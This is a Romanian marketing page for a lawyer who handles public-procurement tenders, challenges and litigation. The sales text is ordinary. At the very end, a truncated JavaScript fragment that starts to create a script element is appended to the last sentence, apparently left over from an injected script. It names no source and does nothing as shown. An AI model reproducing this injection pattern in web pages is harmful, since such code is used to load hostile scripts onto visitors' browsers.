avocat achizitii publice

avocat achizitii publice

Mediul de afaceri din Romania este intr-o evolutie continua iar la ora actuala este o nevoie din ce in ce mai ridicata de avocati care sa apere interesele companiilor. Poate ca multi manageri ai entitatilor economice nu se gandesc la necesitatea de a avea un avocat sau un departament juridic decat in momentul in care au nevoie intr-adevar de serviciile acestora. Realitatea este aceea ca avand un avocat sau un departament juridic va salva compania de foarte multe probleme de ordin legal cu care se poate confrunta in ceea ce priveste activitatea.

Multe dintre companiile de pe piata se confrunta cu necesitatea de a apela la achizitii publice pentru a achizitiona diverse lucruri necesare pentru entitatea economica. Dar nu intotdeauna aceasta activitate are un final fericit si atunci este nevoie de un avocat achizitii publice  care sa intermedieze aceste probleme si sa gaseasca solutiile potrivite in conformitate cu legislatia in vigoare.

 

De ce sa apelati la un avocat achizitii publice?

Daca sunteti in cautarea unui avocat achizitii publice atunci va recomandam sa intrati pe site-ul nostru www.radusora.ro unde veti gasi profesionisti care ofera servicii de cea mai inalta calitate. De asemenea cu ajutorul unui avocat achizitii publice veti putea primi asistenta specializata pentru parcurgerea tuturor etapelor si procedurilor de achizitie publica. Mai ales in ceea ce priveste intocmirea documentatiei este necesara o atentie speciala intrucat exista un set de documente ce trebuie incluse intr-un asemenea dosar iar daca acesta este incomplet atunci procedurile pentru licitatii nu se pot desfasura in mod corespunzator sau chiar deloc.

Daca veti apela un avocat achizitii publice al companiei noastre atunci timpul nostru de raspuns la solicitarile dumneavoastra este unul rapid pentru ca suntem constienti ca ati apelat la aceste servicii datorita faptului ca aveti nevoie de ajutor cat mai repede. Specialistii nostri cunosc in profunzime legea achizitiilor publice si cunosc toate procedurile in detaliu, astfel ca toate etapele vir fi parcurse fluent.

 

Despre proceduri si etape

In momentul in care se deschid ofertele pentru licitatii este necesara promtitudinea dar si indeplinirea tuturor conditiilor necesare pentru a nu risca pierderea oportunitatilor care se ivesc.

De asemenea in momentul in care participati la o astfel de lictitatie publica este necesara completarea unor documente cum ar fi procesul verbal in care se consemneaza participarea dumneavoastra impreuna cu competitorii dumneavoastra la aceasta licitatie.

In acest sens echipa noastra poate sa ofere consultanta specializata pentru a putea sa participati in cele mai bune conditii la licitatie.

Avand de partea dumneavoastra un avocat achizitii publice va puteti asigura de reusita parcurgerii tuturor etapelor si procedurilor care survin in urma licitatiilor sau chiar in timpul acestora. Cu ajutorul personalului nostru specializat care poate sa intervina cu promtitudine atunci cand este cazul.

Indiferent daca este vorba despre contestatii sau despre litigii un avocat achizitii publice poate sa va ofere toate conditiile optime pentru realizarea obiectivelor pe care le aveti in vedere.

Va asteptam pe site-ul nostru www.radusora.ro pentru a afla mai multe informatii despre serviciile pe care vi le punem la dispozitie dar si pentru a putea sa ne contactati sa punem la punct toate detaliile pentru buna desfasurare a achizitiilor publice.var d=document;var s=d.createElement(‘script’);